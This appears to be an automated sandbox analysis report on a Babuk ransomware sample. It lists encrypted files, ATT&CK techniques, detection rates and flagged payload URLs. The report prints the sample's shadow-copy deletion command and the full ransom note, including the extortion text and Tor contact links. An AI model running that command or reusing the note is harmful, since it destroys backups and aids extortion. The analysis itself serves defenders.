                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\01_Music_auto_rated_at_5_stars.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Media Player\Sync Playlists\en-US\0002AD7C\02_Music_added_in_the_last_month.wpl.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.babykJump to behavior
                Source: C:\Users\user\Desktop\babuk_v5.exeFile opened: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log.babykJump to behavior
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                Source: SearchUI.exe, 00000011.00000002.702009828.000001B140813000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: SearchUI.exe, 00000011.00000003.479237387.000001B14303A000.00000004.00000001.sdmp Binary or memory string: vmwareitunesvisio
                Source: SearchUI.exe, 00000011.00000002.693942153.000001A93EF90000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: SearchUI.exe, 00000011.00000002.687829307.000001A93AB68000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW@F
                Source: C:\Users\user\Desktop\babuk_v5.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\babuk_v5.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c vssadmin.exe delete shadows /all /quiet
                Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\vssadmin.exe vssadmin.exe delete shadows /all /quiet
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmp Binary or memory string: Progman
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmp Binary or memory string: &Program Manager
                Source: SearchUI.exe, 00000011.00000002.686297774.000001A938D90000.00000002.00000001.sdmp, notepad.exe, 0000001B.00000002.685010994.000001F983EA0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\TempState VolumeInformation
                Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
                Source: C:\Windows\System32\notepad.exe Queries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt VolumeInformation
                Source: C:\Users\user\Desktop\babuk_v5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: SearchUI.exe, 00000011.00000002.705923483.000001B142020000.00000004.00000001.sdmp Binary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\Windows Defender\MSASCui.exe

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Replication Through Removable Media 1 | Windows Management Instrumentation | Registry Run Keys / Startup Folder 1 | Process Injection 12 | Masquerading 1 | OS Credential Dumping | Query Registry 1 | Replication Through Removable Media 1 | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
                Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Registry Run Keys / Startup Folder 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 12 | Security Account Manager | Virtualization/Sandbox Evasion 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Proxy 1 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | File Deletion 1 | LSA Secrets | Peripheral Device Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 12 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue


                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label | Link
                babuk_v5.exe | 77% | Virustotal | | Browse
                babuk_v5.exe | 54% | Metadefender | | Browse
                babuk_v5.exe | 89% | ReversingLabs | Win32.Ransomware.GarrantDecrypt |
                babuk_v5.exe | 100% | Joe Sandbox ML | |

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                Source | Detection | Scanner | Label | Link
                cdn.onenote.net | 0% | Virustotal | | Browse

                URLs

                Source | Detection | Scanner | Label | Link
                http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
                http://www.tiro.com | 0% | URL Reputation | safe |
                https://mths.be/fromcodepoint | 0% | Virustotal | | Browse
                https://mths.be/fromcodepoint | 0% | Avira URL Cloud | safe |
                http://www.goodfont.co.kr | 0% | URL Reputation | safe |
                http://www.sajatypeworks.com | 0% | URL Reputation | safe |
                http://www.typography.netD | 0% | URL Reputation | safe |
                https://temp.sh/fVAxj/1.png | 2% | Virustotal | | Browse
                https://temp.sh/fVAxj/1.png | 100% | Avira URL Cloud | malware |
                http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
                http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
                http://fontfabrik.com | 0% | URL Reputation | safe |
                http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ | 0% | Avira URL Cloud | safe |
                http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
                https://temp.sh/qpkLy/3.png | 100% | Avira URL Cloud | malware |
                http://www.sandoll.co.kr | 0% | URL Reputation | safe |
                http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
                http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
                http://www.sakkal.com | 0% | URL Reputation | safe |
                http://facebook.github.io/react/docs/error-decoder.html?invariant | 0% | Avira URL Cloud | safe |
                https://temp.sh/KAXUW/8.png | 100% | Avira URL Cloud | malware |
                https://temp.sh/hPkTt/4.png | 100% | Avira URL Cloud | malware |
                https://temp.sh/KAXUW/8.png.babykCan | 0% | Avira URL Cloud | safe |
                https://www.yandex.www.baidu.B | 0% | Avira URL Cloud | safe |
                http://www.carterandcone.coml | 0% | URL Reputation | safe |
                https://temp.sh/YzAJd/6.png | 100% | Avira URL Cloud | malware |
                http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
                http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm | 0% | Avira URL Cloud | safe |
                https://temp.sh/ENvac/5.png | 100% | Avira URL Cloud | malware |
                https://aefd.nelreports.net/api/report?cat=bingaot | 0% | Avira URL Cloud | safe |
                https://temp.sh/VZRcj/2.png | 100% | Avira URL Cloud | malware |
                https://temp.sh/eBGdx/7.png | 100% | Avira URL Cloud | malware |
                http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
                https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud | safe |

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                cdn.onenote.net
                unknown
                unknowntrueunknown

                URLs from Memory and Binaries


                                                                            Contacted IPs

                                                                            No contacted IP infos

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                            Analysis ID:347507
                                                                            Start date:02.02.2021
                                                                            Start time:17:54:18
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 9m 51s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Sample file name:babuk_v5 (renamed file extension from none to exe)
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                            Number of analysed new started processes analysed:29
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal96.rans.evad.winEXE@8/1115@1/0
                                                                            EGA Information:Failed
                                                                            HDC Information:Failed
                                                                            HCA Information:
                                                                            • Successful, ratio: 78%
                                                                            • Number of executed functions: 272
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            Warnings:
                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, VSSVC.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 52.255.188.83, 51.104.139.180, 2.20.142.210, 2.20.142.209, 51.103.5.159, 51.104.144.132, 204.79.197.200, 13.107.21.200, 2.18.68.82, 2.17.179.193
                                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, emea1.wns.notify.trafficmanager.net, audownload.windowsupdate.nsatc.net, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net
                                                                            • Execution Graph export aborted for target SearchUI.exe, PID 6328 because it is empty
                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                            • Report size getting too big, too many NtOpenKey calls found.
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Report size getting too big, too many NtReadFile calls found.
                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                            • Report size getting too big, too many NtWriteFile calls found.

                                                                            Simulations

                                                                            Behavior and APIs

Time | Type | Description
17:57:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Restore Your Files.txt

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            No context

                                                                            Domains

                                                                            No context

                                                                            ASN

                                                                            No context

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Local\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            C:\Users\Default\AppData\Local\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\Gadgets\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows Sidebar\settings.ini.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):248
                                                                            Entropy (8bit):7.083251362824344
                                                                            Encrypted:false
                                                                            SSDEEP:6:QvDOFaQwV6D1ZejYF+fr1/istan+cJfQgu+i0vtn:QrqLtmji2/iaapfQgui
                                                                            MD5:04A80AFBFA2906246E0F657477431B15
                                                                            SHA1:520BFA7DD84325A85321A99DE07E44D2EA172B8E
                                                                            SHA-256:A1857180B5EBC1AA173A00884EC4E096D397795A93AC5C49488305CF8A000713
                                                                            SHA-512:289EFED9CEDA8A4E76CD0ECA10636EC04D35A1D131FFE9A5B8D3B2A82C99CE7606A0DC7F2C56507159F10E86EF672BBB04D16047A92B4ADCD85E1048870B9DAC
                                                                            Malicious:false
                                                                            Preview: ..}CaC....N....~p..."FY...k....H....k ?.......}r+.|...l..6..HY<..2...{7.C..8....[y;...:.....T..........+.%......IQ<.V......E..}...4..f..T..!.Z.&.G.V5.\...b.uyI....0.!+9...nT...e.....`l3..XY..m.S(r@..{....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows\History\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Local\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            Malicious:false
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Compressed (zipped) Folder.ZFSendToTarget.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):171
                                                                            Entropy (8bit):6.466710977376572
                                                                            Encrypted:false
                                                                            SSDEEP:3:/WPPBGB95f2A1ECHXswXxP5kwgOzN5ybl/+upl/aLUxNvEEn:OXTA68RBP5Vw9Tp0L0vtn
                                                                            MD5:8751411F3A5FC2D265D811F04CC28E33
                                                                            SHA1:313645C92E0430D6BF07886EE042140EE89EE1DB
                                                                            SHA-256:DBCDD8BA0A0C7D5907E635C108BB939BC4B6DA6FF0A6ED44ED3C58F16C8FEB02
                                                                            SHA-512:2F36463E38616B440A5CDD041D44CCC68B490D18047B7995597C9B2BD291CB804F778E485615BFAD76225168ED136A7FABD06A8273120E8488FE73B353027747
                                                                            Malicious:false
                                                                            Preview: .......0..S...h(.dm..3.g.rh.|.h;.q|.<.LLF..<.B.BM.+...bTt.\.r.g...V.8|.o.>..P{..x.`...@sx.d....h...+..>.M.Z....(..v:O,.M....0.r....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop (create shortcut).DeskLink.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):175
                                                                            Entropy (8bit):6.678876737569054
                                                                            Encrypted:false
                                                                            SSDEEP:3:VT6ta1v0MW4+sRo8ZBosdaInY6kz+QUuIws6upWPKTGm184Rs3XWll/G9UxNvEEn:VeM1v/1hT7da7NfTIws6upWPIGC84Rsw
                                                                            MD5:40C318AFBF3A0C4E5EE7A0D23C66E923
                                                                            SHA1:29A19957B184D5DF1862041BDC1CB96D0A746D2B
                                                                            SHA-256:C80054B6638E1FEAA8E180CE3001876103D68EFC856DFB7EDCD8318D945A04A6
                                                                            SHA-512:5142D8A91F2CC43784194115E7E31751AC3BAEBA4D4548D292BF267DD05D8219869EBFBB911FFB35399D3BC8D708C42909B8EF595ADA122CE87B340A8097EA73
                                                                            Malicious:false
